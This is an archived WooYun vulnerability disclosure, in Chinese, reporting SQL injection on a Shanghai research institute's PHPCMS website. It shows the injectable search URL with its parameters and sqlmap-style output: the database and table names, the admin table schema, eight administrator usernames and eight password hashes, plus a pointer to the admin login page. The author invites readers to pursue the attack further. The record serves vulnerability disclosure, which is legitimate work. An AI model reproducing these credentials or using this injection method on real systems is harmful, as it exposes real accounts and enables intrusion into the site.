乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-01: 细节已通知厂商并且等待厂商处理中 2015-09-03: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开 2015-09-13: 细节向核心白帽子及相关领域专家公开 2015-09-23: 细节向普通白帽子公开 2015-10-03: 细节向实习白帽子公开 2015-10-18: 细节向公众公开
上海国际问题研究院SQL注射/管理账号爆出/影响中英文双站点
首先是注入点一只:
http://**.**.**.**:80//index.php?a=init&c=index&cid=1&m=search&mid=13&q=1&siteid=1&typeid=54
贴图证明,数据库简单明了,中文英文,目测都差不多哦~~
接下来数据大放送
available databases [3]:[*] information_schema[*] siis[*] siis_enDatabase: siis[130 tables]+-----------------------------------+| v9_admin || v9_admin_panel || v9_admin_role || v9_admin_role_priv || v9_announce || v9_attachment || v9_attachment_index || v9_badword || v9_block || v9_block_history || v9_block_priv || v9_cache || v9_category || v9_category_priv || v9_collection_content || v9_collection_history || v9_collection_node || v9_collection_program || v9_comment || v9_comment_check || v9_comment_data_1 || v9_comment_setting || v9_comment_table || v9_content_check || v9_copyfrom || v9_datacall || v9_dbsource || v9_download || v9_download_data || v9_downservers || v9_extend_setting || v9_favorite || v9_hits || v9_ipbanned || v9_keylink || v9_keyword || v9_link || v9_linkage || v9_log || v9_member || v9_member_group || v9_member_internal || v9_member_menu || v9_member_verify || v9_member_vip || v9_menu || v9_message || v9_message_data || v9_message_group || v9_model || v9_model_field || v9_module || v9_mood || v9_news || v9_news_data || v9_page || v9_pay_account || v9_pay_payment || v9_pay_spend || v9_picture || v9_picture_data || v9_plugin || v9_plugin_var || v9_position || v9_position_data || v9_poster || v9_poster_201301 || v9_poster_201302 || v9_poster_201306 || v9_poster_201310 || v9_poster_201401 || v9_poster_space || v9_queue || v9_release_point || v9_search || v9_search_keyword || v9_session || v9_siis_center || v9_siis_center_data || v9_siis_event || v9_siis_event_data || v9_siis_exam || v9_siis_exam_score || v9_siis_global_review || v9_siis_global_review_data || v9_siis_international_expert || v9_siis_international_expert_data || v9_siis_news || v9_siis_news_data || v9_siis_publication_bg || v9_siis_publication_bg_data || v9_siis_publication_book || v9_siis_publication_book_data || v9_siis_publication_paper || v9_siis_publication_paper_data || v9_siis_publication_report || v9_siis_publication_report_data || v9_siis_publication_review || v9_siis_publication_review_data || v9_siis_review || v9_siis_review_data || v9_siis_video || v9_siis_video_data || v9_site || v9_sms_report || v9_special || v9_special_c_data || v9_special_content || v9_sphinx_counter || v9_sso_admin || v9_sso_applications || v9_sso_members || v9_sso_messagequeue || v9_sso_session || v9_sso_settings || v9_tag || v9_template_bak || v9_times || v9_type || v9_urlrule || v9_video || v9_video_content || v9_video_data || v9_video_store || v9_vote_data || v9_vote_option || v9_vote_subject || v9_wap || v9_wap_type || v9_workflow |+-----------------------------------+Database: siisTable: v9_admin[11 columns]+---------------+-----------------------+| Column | Type |+---------------+-----------------------+| card | varchar(255) || email | varchar(40) || encrypt | varchar(6) || lang | varchar(6) || lastloginip | varchar(15) || lastlogintime | int(10) unsigned || password | varchar(32) || realname | varchar(50) || roleid | smallint(5) || userid | mediumint(6) unsigned || username | varchar(20) |+---------------+-----------------------+Database: siisTable: v9_admin[8 entries]+--------------+| username |+--------------+| fuxinliang || fwg || gjzw || gjzz || phpcms || siis || yangli || zhangjianmin |+--------------+
操蛋的密码解密不出,没钱玩
[18:47:05] [INFO] retrieved: 0190258ba3c19e7d431901d345cd937c[18:47:05] [INFO] retrieved: 1074e1371a96961abbfbb5a504b079dc[18:47:05] [INFO] retrieved: 450359b21ece103d465d827b426915ad[18:47:06] [INFO] retrieved: 5ac340d54e1e9abc355b7d96680c73d4[18:47:06] [INFO] retrieved: 647ef8df39f6c795f162e6d04f9ee42d[18:47:06] [INFO] retrieved: 6ae7e496d01fa2fe94263f01fbba748e[18:47:06] [INFO] retrieved: c63ed4c66d6df526e2a3d0c9ed32a82a[18:47:07] [INFO] retrieved: c8c75e275551cb93fec2bb1e377ec56a
谷歌到后台地址,你们研究吧,么么哒
http://**.**.**.**/index.php?m=admin&c=index&a=login&pc_hash=
综上
你们懂
危害等级:中
漏洞Rank:9
确认时间:2015-09-03 17:22
CNVD确认并复现所述情况,已经转由CNCERT下发给上海分中心,由其后续协调网站管理单位处置。
暂无